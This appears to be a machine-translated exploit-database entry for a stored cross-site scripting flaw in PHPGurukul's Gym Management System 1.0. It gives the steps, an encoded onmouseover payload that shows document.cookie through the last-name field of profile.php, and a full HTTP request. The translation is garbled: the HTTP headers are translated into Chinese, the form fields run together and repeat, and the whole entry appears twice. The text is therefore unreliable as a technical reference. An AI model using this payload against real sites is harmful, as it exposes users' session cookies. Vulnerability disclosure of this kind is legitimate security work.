#利用标题:健身房MS-健身管理系统- 跨站点脚本(存储)
#日期: 29/09/2023
#供应商homepage3360 https://phpgurukul.com/gym-management-system-system-using-php-and-mysql/
#软件link: https://phpgurukul.com/projects/gym-management-system-system-using-php.zip
#版本: 1.0
#最后更新: 2022年8月31日
#测试在: Kali Linux 6.1.27-1kali1(2023-05-12)X86_64 + XAMPP 7.4.30
#1:创建用户,登录并转到profile.php
#2:使用有效载荷x%22%20onmouseover%3DALERT%28Document.Cookie%29%20x%3D%22在Lname Field中。
#3:输入profile.php页面时,每次都会反映cookie。
# 作者
使用Rapplex -Web应用程序安全扫描仪测试时,Alperen Yozgat检测到了此漏洞。
#关于Rapplex
Rapplex是一种Web应用程序安全扫描仪,它在网站中扫描和报告漏洞。
Penters可以将其用作日常任务的自动化工具,但“ Pentester Studio”将在其手动评估中提供如此出色的补充。
因此,该软件不需要单独的开发工具来发现不同类型的漏洞或开发现有引擎。
“利用”工具可用于利用诸如SQL注入,代码注射,fle inspluson之类的漏洞。
#HTTP请求
post/gym/profile.php http/1.1
HOST: LOCALHOST
内容长度: 129
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.93 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
cookie: phpsessID=76E2048C174C1A5D46E203DF87672C25 #change
连接:关闭
fname=testlname=x%22%20onmouseover%3DALERT%28Document.Cookie%29%20x%3D%22 Email=John%40Test.Commobile=1425635241State=delhicity=delhicity=delhicity=new+delhiadress=new+delhiadress=abc+sethe+set+xyz+xyz+xyz+xyz+xyz+colonysubmit=更新
#日期: 29/09/2023
#供应商homepage3360 https://phpgurukul.com/gym-management-system-system-using-php-and-mysql/
#软件link: https://phpgurukul.com/projects/gym-management-system-system-using-php.zip
#版本: 1.0
#最后更新: 2022年8月31日
#测试在: Kali Linux 6.1.27-1kali1(2023-05-12)X86_64 + XAMPP 7.4.30
#1:创建用户,登录并转到profile.php
#2:使用有效载荷x%22%20onmouseover%3DALERT%28Document.Cookie%29%20x%3D%22在Lname Field中。
#3:输入profile.php页面时,每次都会反映cookie。
# 作者
使用Rapplex -Web应用程序安全扫描仪测试时,Alperen Yozgat检测到了此漏洞。
#关于Rapplex
Rapplex是一种Web应用程序安全扫描仪,它在网站中扫描和报告漏洞。
Penters可以将其用作日常任务的自动化工具,但“ Pentester Studio”将在其手动评估中提供如此出色的补充。
因此,该软件不需要单独的开发工具来发现不同类型的漏洞或开发现有引擎。
“利用”工具可用于利用诸如SQL注入,代码注射,fle inspluson之类的漏洞。
#HTTP请求
post/gym/profile.php http/1.1
HOST: LOCALHOST
内容长度: 129
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.93 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
cookie: phpsessID=76E2048C174C1A5D46E203DF87672C25 #change
连接:关闭
fname=testlname=x%22%20onmouseover%3DALERT%28Document.Cookie%29%20x%3D%22 Email=John%40Test.Commobile=1425635241State=delhicity=delhicity=delhicity=new+delhiadress=new+delhiadress=abc+sethe+set+xyz+xyz+xyz+xyz+xyz+colonysubmit=更新
